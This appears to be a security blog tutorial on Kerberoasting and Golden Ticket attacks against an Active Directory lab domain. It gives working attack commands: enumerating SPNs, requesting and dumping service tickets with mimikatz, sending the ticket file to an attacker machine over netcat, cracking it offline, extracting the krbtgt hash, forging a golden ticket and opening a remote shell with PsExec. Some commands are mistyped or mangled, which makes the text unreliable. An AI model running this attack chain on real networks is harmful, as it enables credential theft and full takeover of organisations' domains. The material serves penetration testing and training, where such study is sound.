Basic of Kerberosting
Kerberoasting is one of the most common attacks against domain controllers. It is used to crack a Kerberos (encrypted password) hash using brute force techniques.
Where it allows users to -domain users, to request Kerberos tickets from TGS (ticket-granting service) which are encrypted with NTLM hash of plain password of a domain user which is used as a service account and crack them offline.
Before going for the Golden ticket exploit, let’s get an example for the Kerberosting
If you want, you can set up a windows machine and set it to the specific domain as it will ease the communication from external VM and base machine or what you can do is try any HTB windows machine and try your exploits thereafter gaining the user shell.
I would prefer the second one as I don’t have a heavy configuration.
Mainly What we do is crack the password offline as the part of TGS is used as a service and encrypted with the user’s password.
Note that only user accounts with the “servicePrincipalName” attribute set, are more likely to be exploited for kerberoasting.
So previously when I told you, you can use the machine in the HTB, don’t rely on them, most of the machines won’t have the SPN set, so I had set up a machine of my own with the spn set, downloading the windows server 12.
Search for the set SPN by commands.
You will have a eas on findings things and exploiting, download Powersploit tools (“https://github.com/PowerShellMafia/PowerSploit.git“).
Install all the Powerview recon folders in the system32 folder as it’s already set in the environment.
locate for Get-NetUsers, this will give info on the SPN set or not.
So basic enumeration, Get the domain information.
Run ps> setspn -T dj.com -Q */*
We will request a service ticket for the service they wish to compromise. The domain controller will retrieve the permissions out of the Active Directory database and create a TGS ticket, encrypting it with the service’s password.
As a result, only the service and the domain controller are capable of decrypting the ticket since those are the only two entities that share the secret.
This requested ticket will get stored in the memory, which we will extract and crack.
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/dc-mantvydas.offense.local"
For this we need mimikatz for windows exploitation, you can download mimikatz from the Github “https://github.com/gentilkiwi/mimikatz/releases“, download the latest zip
open a PowerShell session in the folder of mimikatz according to the mimikatz version of windows, mine is x64 so traverse to the specific folder and start the PowerShell session with the bellow command.
This will dump out the files and then you can transfer it by just drag dropping or through NC or HTTP server, as you wish.
We copied the file in the kali.
Start an NC listener in kali and send the file from windows to kali.
nc -lvnp 6666 nc 192.168.182.129 6666<$pathtothemimikatzdump***.dj.com.kirbi
Cracking the Kerberos hashes
After transferring the file, crack the kirbi file with the python tool, I prefer the python (“tgsrepcrack.py”) or there are tons of tools in the market, like –
Use the command for cracking it, basically, the password cracking depends on the wordlist you use. I made a custom wordlist combining the wordlist which was already present.
this slowed the time a bit, usually when you don’t know it will take time.
python3 tgsrepcrack.py /usr/share/wordlists/wfuzz/general/common.txt ../[email protected]~dj.com-DJ.COM.kirbi
you can use the Invoke-Kerberoast and dump the hash format for the key and then crack it using the Hashcat “]
A golden ticket attack allows an attacker to create a Kerberos authentication ticket from a compromised service account, called krbtgt, with the help of Mimikatz.
This requires a user with an admin right purely authenticated as we have exploited the user above and gained access.
To perform this attack the user must be authenticated to perform any action, thus requesting a service or a ticket from the domain that will check if the user is authenticated or not.
Thus, by compromising the KRBTGT account the attack can create session tickets that already have the valid krbtgt hash.
This attack assumes a Domain Controller compromise where KRBTGT account hash will be extracted which is a requirement for a successful Golden Ticket attack.
Extracting the krbtgt account NTLM hash using mimikatz.
Already the mimikatz were installed, just use the below commands. we have to create a forged TGT and then extract the “domain name, SID, KRBTG Hash “.
mimikatz # privilege::debug mimikatz # lasdump::lsa /inject /name:krbtgt ( you can provide different name)
kerberos::golden /user:cursed /domain:DJ.COM /sid:S-1-5-21-1658281939-3107778392-223560393 /krbtgt:8b6da8753625a156ddda6272b9ce8cb4 /id:500 /ptt misc::cmd
To confirm use the Klist command in the mimikatz, which will show the Client user which is just created by you.
pushd \WIN-6E7EBF87UMR.dj.comc$ ls
you can use the before one where through misc::cmd opened a cmd which connects you with the domain controller, you can download the PsExec.exe for connecting to the network and gaining the shell access
psexec.exe \169.254.164.158 cmd.exe
Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.
Get in touch with us. Click on the get started button below.